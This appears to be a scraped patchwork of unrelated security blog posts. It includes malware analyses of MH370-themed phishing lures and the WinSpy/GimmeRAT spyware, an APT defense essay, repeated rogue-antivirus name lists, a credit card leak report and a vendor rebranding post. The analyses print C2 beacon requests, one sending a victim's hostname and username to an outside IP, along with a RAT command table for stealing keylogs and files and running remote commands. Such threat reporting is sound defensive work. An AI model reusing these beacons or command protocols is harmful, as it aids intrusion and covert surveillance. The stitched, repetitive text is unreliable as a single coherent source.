On March 18, 2014 a sample entitled “Malysia Airline MH370 hijacked by Pakistan.zip” was sent as a ZIP file (MD5: 7dff5c4ae1b1fea7ecbf7ab787da3468) that contained a Windows screensaver file disguised as a PDF (MD5: b03edbb264aa0c980ab2974652688876). The ZIP file was hosted on 199.91.173.43. This IP address was previously used to host malicious files.

The screen saver file drops “winservice.exe” (MD5: 828d4a66487d25b413cb19ef8ee7c783) which begins beaconing to 199.91.173.45. This IP address was previously used to host a file entitled “obl_leaked_report.zip” (MD5: a4c7c79308139a7ee70aacf68bba814f).

The initial beacon to the command-and-control server is as follows:

POST /path_active.php?compname=[HOSTNAME]_[USERNAME] HTTP/1.1

Host: 199.91.173.45

Accept: */*

Content-Length: 11

Content-Type: application/x-www-form-urlencoded

This same control server was used in previous activity.

The Page Campaign

A final malicious document was seen abusing the missing Flight 370 story on March 18, 2014. This document exploited CVE-2012-0158 and was entitled “MH370 PM statement 15.03.14 - FINAL.DOC” (MD5: 5e8d64185737f835318489fda46f31a6). This document dropped a Backdoor.APT.Page implant and connected to 122.10.89.85 on both port 80 and 443. The initial beacon traffic over port 80 is as follows:

GET /18110143/page_32180701.html HTTP/1.1

Accept: */*

Cookie: XX=0; BX=0

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)

Host: 122.10.89.85

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

Conclusion

While many APT actors have adopted strategic Web compromise as a delivery vector, it is apparent that spear phishing via email-based attachments or links to zip files remain popular with many threat actors, especially when paired with lures discussing current media events. Network defenders should incorporate these facts into their user training programs and be on heightened alert for regular spear-phishing campaigns, which leverage topics dominating the news cycle.

Acknowledgement: We thank Nart Villeneuve and Patrick Olsen for their support, research, and analysis on these findings.

Defending Against the APT


Advanced Persistent Threat (APT)

Introduction
APT, formerly known as the Advanced Persistent Threat, is the buzz word that everyone is using. Companies are concerned about it, the government is being compromised by it and consultants are using it in every presentation they give.   One of the main reasons organizations are broken into today is because they are fixing the wrong vulnerabilities.  If you fix the threats of 3 years ago, you will lose.  APT allows organizations to focus on the real threats that exist today.

While APT is important, we need to clear the smoke and hype, focusing on why it is important and what it means to you.  Instead of just using it as a buzz word, if we understand the core components of APT, we can use it to improve our security.  In APT, threat drives the risk calculation.  Only by understanding the offensive threat will an organization be able to fix the appropriate vulnerabilities. 

What is APT?
APT is the new way attackers are breaking into systems.  APT is a sophisticated, mercurial way that advanced attackers can break into systems, not get caught, keeping long-term access to exfiltrate data at will.  The following are the important things to remember:

1)      APT focuses on any organization, both government and non-government organizations.  Some people make the mistake of thinking that the APT is only focused on Department of Defense (DoD) sites.  When it comes to the Internet the lines between government and commercial are blurring and anything that could cause harm to a country will be targeted.

2)      While the threat is advanced once it gets into a network, the entry point with many attacks is focusing on convincing a user to click on a link.  However, once the APT breaks into a system, it is very sophisticated in what it does and how it works.  Signature analysis will be ineffective in protecting against it.  Advanced attacks are always changing, recompiling on the fly and utilizing encryption to avoid detection.

3)      Many organizations make the mistake of thinking of attacks like the weather.  There will be some stormy days and there will be some sunny days.  However, on the Internet you are always in a storm.  In the past, attackers would periodically attack an organization.  Today attacks are nonstop.  The attackers are persistent, and if an organization lets their guard down for any period of time, the chance of a compromise is very high.

4)      Attackers want to take advantage of economy of scales and break into as many sites as possible as quickly as possible.  Therefore the tool of choice of an attacker is automation.  Automation is not only what causes the persistent nature of the threat, but it is also what allows attackers to break into sites very quickly.

5)      Old school attacks were about giving the victim some visible indication of a compromise.  Today it is all about not getting caught.  Stealth and being covert are the main goals of today’s attacks.  APT‘s goal is to look as close {if not identical} to legitimate traffic.  The difference is so minor that many security devices cannot differentiate between them.

6)      The driver of APT is to provide some significant benefit to the attacker, the benefit being either economic or financial gain.  Therefore the focus will be all about the data.  Anything that has value to an organization means it will have value to an attacker.  Since data has become so portable, and with cloud computing increasing in popularity, data is now available from the Internet, via many sources.

7)      Attackers do not just want to get in and leave, they want long term access.  If someone is going to spend effort breaking into a site, they will make sure they can keep that access for a long period of time.  Stealing data once has value, but stealing data for 9 months gives the attacker even more payoff.

Putting all of this together means that you will be constantly attacked and compromised, making it necessary for an organization to always be in battle mode.  This is a never ending battle.  Since the APT is meant to be extremely stealthy, there is a good chance that an organization might be compromised and not know about it for several months.  Before you discount this, if you were compromised and the attacker was not doing any visible damage, how would you know? 

How to Defend Against the APT?
Prevention is ideal, but detection is a must.  Most organizations focus solely on preventive measures but the problem with the APT is that it enters a network and looks just like legitimate traffic and users.  Therefore, there is little to prevent.  Only after the packets are in the network do they start doing harm and breaking in.

Based on the new threat vectors of the APT, the following are key things organizations can do to prevent against the threat:

1)      Control the user and raise awareness – the general rule is you cannot stop stupid, but you can control stupid.  Many threats enter a network by tricking the user into clicking a link that they shouldn’t.  Limiting the actions a user are allowed to do with proper awareness sessions can go a long way to reduce the overall exposure.

2)      Perform reputation ranking on behavior – traditional security tries to go in and classify something either as good or bad, allow or block.  However with advanced attacks, this classification does not scale.  Many attackers start off looking like legitimate traffic, which means they would be allowed into the network, and then once they are in they turn bad.  Therefore, since the goal of attackers is to blend in, you need to track what the behavior is and rank the confidence level of whether it is looking more like a legitimate user or more like evil.

3)      Focus on outbound traffic – Inbound traffic is often what is used to prevent and stop attackers from entering a network.  While it will catch some attacks and is still important to do, with the APT it is the outbound traffic that is more damaging.  If the intent is to stop exfiltration of data and information, looking at the outbound traffic is how you detect anomalous behavior, which is tied to damage to an organization. 

4)      Understand the changing threat – it is hard to defend against something you do not know about.  Therefore, the only way to be good at the defense is to understand and know how the offense operates.  If organizations do not continue to understand the new techniques and tactics of the attackers, they will not be able to effectively tune their defensive measures to work correctly.

5)      Manage the endpoint – while attackers might break into a network as the entry point, they ultimately want to steal information that exists on endpoints.  If you want to limit the damage, controlling and locking down the endpoint will go a long way to protect an organization.

While the current threat is advanced, persistent, stealthy, and data focused, organizations can implement effective measures to protect their sites.

Summary
APT is only going to increase in intensity over the next year, not go away.  Ignoring this problem just means there will be harm caused to your organization.  The key theme of dealing with APT is “Know thy system/network.”  The more an organization can understand about network traffic and services, the better they can spot/identify anomalies through clipping levels, which is the better way to defend against the APT.  The ultimate way to make sure an organization is properly protected is to run simulated attacks (i.e. penetration testing, red teaming, ethical hacking) and see how vulnerable an organization is, and most importantly how quickly you detected it.  The key to making this successful is to 1) always get explicit approval 2) run benign attacks 3) make sure the people running the test are of equal expertise to the true attacker; and 4) fix any vulnerabilities in a timely manner.  The good news is, by focusing in on understanding the threats and an organization’s vulnerabilities, you can properly defend against the APT. 

Windows AntiBreach Patrol

Windows AntiBreach Patrol is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Antivirus Patrol, Windows Pro Defence Kit, Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Windows Antivirus Patrol

Windows Antivirus Patrol is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Pro Defence Kit, Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Potential 7 Million Credit Card Details Leaked

UPDATE: Based on further analysis along with discussions with journalists, it appears that this credit card dump contains valid, but older card data that had been previously disclosed. To date, there is no solid evidence this represents a new breach.

The last couple of weeks have seen tensions rising between Russia and Ukraine, and along with it an increase in computer crime.

Sometime earlier this morning, a post allegedly by Anonymous Ukraine has claimed to have published “more than 800 million credit cards” by releasing four archives: Visa, Mastercard, American Express, and Discover cards. Based on the initial analysis by Risk Based Security, the number appears to come to a total of 955,579 cards.

While such an attack does not appear to be directly related to the political strife between Ukraine and Russia, it does raise significant issues for card processors and consumers if the leak is legitimate.

Anonymous Ukraine has posted a short message to Pastebin that includes the following:

Today we publish the first part of our exposure of the international financial system Visa, MC, Discover & Amex, enslaved people around the world. More than 800 million credit cards. Over a trillion dollars.

Each of the four archives appear to have valid card numbers, bank routing numbers, and full names. The dump of information does not contain the credit card CCV (Card Verification Value) or card expiry information. Without this information, committing fraud with the leaked information may be more difficult.

At this time, there is no indication where the data comes from or if it is from a single source or multiple. Risk Based Security and the DatalossDB project will continue to examine the data and investigate in hopes of determining more information about the breach.

Update 7:40P EST – In addition to the 1 million cards disclosed earlier, Anonymous Ukraine has followed up with an additional leak of over 6 million more cards announced in a Tweet. Initial analysis of the new dump by RBS shows 6,064,823 new cards. That breaks down to 668,279 American Express, 3,255,663 Visa, 1,778,749 Mastercard, and 362,132 Discover. Counting the disclosure earlier today and the subsequent dump, the grand total now sits at 7,020,402. Upon cursory examination, a majority of cards seem to come from United States banks. Among the information released, approximately 4,000 come with full user data including social security number, credit card, card card expiry, name, pins, floats, dates of birth, states, and zip codes. The new Pastebin dump from the group also suggests the data may come from ATMs or POS systems.

New look, new mission, new FREEDOM

Since classified documents illuminating America’s mass surveillance began being released last year, we at F-Secure began feeling different, uneasy—even a little angry.

For well over a decade, we’ve vowed to identify any government trojans. However, the general disregard for the privacy of individuals all over the world shown by the NSA and other government intelligence agencies shocked us. Suddenly, it seemed that we couldn’t just offer the award-winning security and backup solutions in the same way we have for 25 years.

We had to take a stand.

F-Secure was born in Finland and born both of a spirit of connection and independence. Finland is part of the EU but outside NATO. It’s a global hotspot for tech innovation, but so committed to privacy that employers aren’t even allowed to Google job applicants. It’s part of the online revolution that has reshaped the way we communicate, but the economy was forced to dramatically re-adapt as cell phones became smartphones.

We’ve spent the last six months rethinking our mission, our products and what we stand for. Now we’re ready to announce that we’re no longer simply about “Protecting the Irreplaceable”, though our legacy will always burn deep in our DNA. Now, we have to be about something deeper.

Our new tagline is: Switch on Freedom

digitalfreedom

And it isn’t just about a promise to you, our customers, it’s about a stand against an invasive mindset that doesn’t value the privacy of your personal data, no matter how many times people suggest that surveillance is only a problem “if you have something to hide.” (Who doesn’t? Did you leave your house wearing pants today? Furthermore, it’s no one’s business but your own what you are doing online.)

Our new look says that we fight for digital freedom.

That’s what our Labs has been doing for decades by protecting you from online criminals. Now that we have even bigger enemies, our products can’t just protect your PC—they have to protect the way you connect and share, too.

aboutfreedom

Your hard drive, your VPN, your content is only as secure and private as the partner you choose to protect you. Our promise to you is that we will never compromise your privacy and we will never open our technology to any government for any reason other than a direct, lawful criminal investigation.

Your privacy is non-negotiable and that’s the core value we operate upon as we build our tools to set you free as you engage in the life you wish to lead.

Now – as the world is waking up to the real threat of governments with unchecked power to capture data on everything we do and keep it forever – is the time for us to stand up.

“The world is changing,” our Mikko Hypponen recently told the TED Radio hour. “We shouldn’t just blindly accept the change. Just because something is technologically possible, it might not be right. And we really have to think about these things now when we can still change them.”

We are doing what we can both in advocating for governments to respect privacy and in building solutions that protect your freedom, regardless of what politicians and corporations want.

We hope you’ll join us.

Cheers,
Sandra

sandra

Code Injection and API Hooking Techniques

Hooking covers a range of techniques used for many purposes like debugging, monitoring, intercepting messages, extending functionality etc. Hooking is also used by a lot of rootkits to camouflage themselves on the system. Rootkits use various hooking techniques when they have to hide a process, hide a network port, redirect file writes to some different […]

Windows Pro Defence Kit

Windows Pro Defence Kit is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

From Windows to Droids: An Insight in to Multi-vector Attack Mechanisms in RATs

FireEye recently observed a targeted attack on a U.S.-based financial institution via a spear-phishing email. The payload used in this campaign is a tool called WinSpy, which is sold by the author as a spying and monitoring tool. The features in this tool resemble that of many other off-the-shelf RATs (Remote Administration Tools) available today. We also observed a second campaign by a different attacker where the WinSpy payload was implanted in macro documents to attack various other targets in what appears to be a spam campaign.

The command-and-control (CnC) infrastructure used in the attack against the financial institution is owned and controlled by author of WinSpy. This does not necessarily mean the author is behind attack as the author provides the use of his server for command and control as well as to store the victim data as the default option in the WinSpy package. This feature allowing shared command-and-control infrastructure advertently or inadvertently provides another level of anonymity and deniability for the attacker.

While analyzing the windows payloads for WinSpy we discovered that it also had Android spying components, which we have dubbed GimmeRat. The Android tool has multiple components allowing the victim’s device to be controlled by another mobile device remotely over SMS messages or alternatively through a Windows-based controller. The Windows-based controller is simplistic and requires physical access to the device. The recent surge in Android-based RATs such as Dendroid and AndroRAT shows a spike in the interest of malicious actors to control mobile devices. GimmeRAT is another startling example of malicious actors venturing into the Android ecosystem.

Attacks Employing WinSpy

While the WinSpy tool is being sold as a spying and monitoring tool for home users, its remote administration capabilities fits the bill for an adversary looking to infiltrate a target or organization. This tool also adds another layer of anonymity for the attacker by using the default command-and-control server provided as part of the WinSpy package.

Figure 1 - Mechanism of attack on financial institution employing WinSpy

The attack targeting a U.S. financial institution arrives via a spear-phishing email. The attachment (b430263181959f4dd681e9d5fd15d2a0) in the email is a large NSIS packed file, which when detonated launches a screenshot of a pay slip as decoy to avert the attention of the victim. It also drops and launches various components as seen in Figure 1 and Figure 2.

Figure 2 - Components of WinSpy

We observed a second attacker using WinSpy in macro documents (78fc7bccd86c645cc66b1a719b6e1258, f496bf5c7bc6843b395cc309da004345) as well as standalone executables (8859bbe7f22729d5b4a7d821cfabb044, 2b19ca87739361fa4d7ee318e6248d05). These arrive either as an attachment or as a link to the payload in emails. The documents had the unique metadata shown below:

File Type                       : XLS

MIME Type                    : application/vnd.ms-excel

Author                          : MR. FRANK

Last Modified By              : MR. FRANK

Software                        : Microsoft Excel

Create Date                    : 2012:02:07 10:41:21

Modify Date                     : 2012:02:07 10:41:29

Security                          : None

Code Page                       : Windows Latin 1 (Western European)

Company                         : USER

App Version                     : 11.5606

The email attacks were found to have attachment names such as

Western Union Slip.xls
Money Transfer Wumt.xls
Wumt.xls

Windows Components

The WinSpy modules are written in Visual Basic and use some freely available libraries such as modJPEG.bas and cJpeg.cls . The components each support various features as shown below.

Feature Component
Webcam monitoring Webcam monitoring RDS.exe RDS.exe
Screen capture & JPEG Encoder Screen capture & JPEG Encoder RDS.exe RDS.exe
Connectivity check Connectivity check RDS.exe RDS.exe
Send Victim information to CnC Send Victim information to CnC RDS.exe RDS.exe
FTP exfiltration FTP exfiltration RDS.exe RDS.exe
Status Report to CnC Status Report to CnC windns.exe windns.exe
Email/FTP exfiltration Email/FTP exfiltration windns.exe windns.exe
AV Find and Kill AV Find and Kill windns.exe windns.exe
Auto configure firewall Auto configure firewall windns.exe windns.exe
Keylogging and reports Keylogging and reports messenger.exe messenger.exe
Backdoor for remote interaction Backdoor for remote interaction rdbms.exe rdbms.exe
Microphone recording Microphone recording rdbms.exe rdbms.exe
Upload/download/execute files Upload/download/execute files rdbms.exe rdbms.exe
File system browser File system browser rdbms.exe rdbms.exe
Execute remote commands Execute remote commands rdbms.exe rdbms.exe
Send messages to remote machine Send messages to remote machine rdbms.exe rdbms.exe

The WinSpy malware creates its configuration in the registry under "SOFTWARE\MSI64" as shown in Figure 2. The various components of WinSpy read this configuration at runtime. This configuration dictates various settings such as the username, unique identifier, connection parameters, remote FTP server and credentials, filename and path for captured data, current status, etc. The various options in the configuration are abbreviations. For example "DUNIN" stands for date to uninstall, "FTSV" stands for FTP server, "FTUS" stands for FTP user, and so forth. The "SID2" value is a unique ID used to identify the infection and is generated at build time.

Figure 3 - WinSpy Configuration

The WinSpy controller has options to create a new remote file allowing you to choose various parameters and exfiltration options. The author interestingly allows for default command and control and exfiltration options to a server he controls.

Figure 4 - WinSpy Builder

The controller has options to retrieve screenshots, keylogs, and various reports from the victim’s machine. It also has the ability to interact with file system to upload and download files as well as execute new payloads.

Figure 5 - WinSpy Controller
 
 


 
 
Figure 6 - WinSpy File Browser

Command and Control

The WinSpy payloads have multiple communication methods for reporting status, attacker interaction, and data exfiltration each of which are described below.

Method 1 - I am online :

It reports back to the authors server on port 14001 to report the victim's online status with "/P" and it receives the same command in response to acknowledge.

Figure 7 - Online Status

Method 2 - Victim Information:

It also reports back to the WinSpy author’s server on port 27171 using a secondary protocol shown below. The request contains the victim’s IP address as well as unique identifier generated at build time of the payload. The server responds with a keep alive in response to this request.

Figure 8 - Victim Information
Figure 9 - Victim information

Method 3 - SMTP Exfiltration:

It relays keylog data through SMTP if configured. It relays emails through an SMTP server running on port 37 on the WinSpy author’s server using preconfigured authentication parameters. Port 37 is typically used by NTP protocol but in this case the author has reconfigured it for SMTP relay. The X-Mailer "SysMon v1.0.0" sticks out like a sore thumb.

Figure 10 - SMTP Exfiltration

Method 4 - FTP Exfiltration:

If configured with a custom FTP server, the WinSpy payload will upload all intercepted data and report to the remote server periodically. The FTP credentials are stored in the registry configuration discussed earlier.

Method 5 - Direct Interaction:

The rdbms.exe module listens on port 443 on the victim’s machine. The attacker can directly connect to this port from the WinSpy controller and issue various commands to download captured data, upload/download files, execute files, send messages, view webcam feeds, etc. Any required data transfer is done over Port 444. It supports various commands, the significant ones are shown below. The initial connection commands shows that the author plans to implement authentication at some point in time but as it stands now anyone can connect to an infected instance using this command.

Command Description
/CLUserName.Password. /CLUserName.Password. Initialize connection from controller Initialize connection from controller
/CK /CK Acknowledge Acknowledge
/CB{OptionalPath} /CB{OptionalPath} Enumerates all files in root dir or specified path Enumerates all files in root dir or specified path
/CU{FilePath} /CU{FilePath} Uploads specified File Uploads specified File
/CD{FilePath} /CD{FilePath} Downloads file from specified path Downloads file from specified path
/CD \\\KEYLOGS /CD \\\KEYLOGS Download keylogs Download keylogs
/CD \\\WEBSITED /CD \\\WEBSITED Download websites visited detail report Download websites visited detail report
/CD \\\WEBSITES /CD \\\WEBSITES Download websites visited summary report Download websites visited summary report
/CD \\\ONLINETIME /CD \\\ONLINETIME Download online time report Download online time report
/CD \\\CHATROOM /CD \\\CHATROOM Download chat logs Download chat logs
/CD \\\PCACTIVETIME /CD \\\PCACTIVETIME Download PC active time report Download PC active time report
/RF{FilePath} /RF{FilePath} Execute remote file in specified path Execute remote file in specified path
/WO & /WE /WO & /WE Webcam init and enable Webcam init and enable
/SO /SO Start microphone recording Start microphone recording
/AR{Command} /AR{Command} Run command on remote machine Run command on remote machine
/AM{Message} /AM{Message} Sends message to remote machine Sends message to remote machine

Android Components

In the process of investigating the Windows modules for WinSpy we also discovered various Android components that can be employed to engage in surveillance of a target. We have found three different applications that are a part of the surveillance package. One of the applications requires commandeering via a windows controller and requires physical access to the device while the other two applications can be deployed in a client-server model and allow remote access through a second Android device.

Figure 11 - Deployment Scenarios for Android Components

 Windows Physical Controller:

The Windows controller requires physical access to the device and allows the attacker to retrieve screenshots from the infected device. This component is designed to target a victim in physical proximity. The various options available in the Windows controller are shown in Figure 12 below.

Figure 12 - Windows Controller for Android Device

 

The functionality and structure of the components on the victim’s device are described below in detail.

Component 1 -  GlobalService.apk

 

Components:
          a. Services
                    Global Service
          b. Methods
                    Sleeper
                    ScreenCapturer
                    ServiceActivity

Main activity

The app is started with an intent that is provided from the desktop android executable. The intent is a "com.google.system.service.StartUpReceiver" intent with the extra field of "interval" which holds a string of the form

“interval@@hostname@@port@@username@@password@@working_directory@@delete_after_upload”

The hostname, port, username, and password are used to connect to the attackers' FTP server to send screenshots, which is explained, in a later section. Once this intent is received the GlobalService is restarted with the interval parameter..

GlobalService

This service contains the following variables

         private static final String TAG = "GlobalService";
         private static boolean isScreenON;
         private int mInterval;
         private KeyguardManager mKeyGaurdManager;
         private BroadcastReceiver mPowerKeyReceiver;
         private Timer mSyncTimer;
         private TimerTask mSyncTimerTask;

It goes on to check the value of the isScreenON variable. If the screen is on and if the keyguard has been unlocked, it calls the startScreenCaptureThread() method.

The startScreenCaptureThread method sets the value of the mInterval variable to the value of interval passed to GlobalService. It also sets the properties of the mSyncTimerTask to point to the takeScreenshot method from the ScreenCapturer class such that the thread, when invoked, will take a screenshot every ‘interval’ number of seconds.

The takeScreenshot method in the ScreenCapturer class connects to a native service using a local socket. It connects to port 42345 on localhost. The native service, which is listening on the same port, accepts strings on the socket.

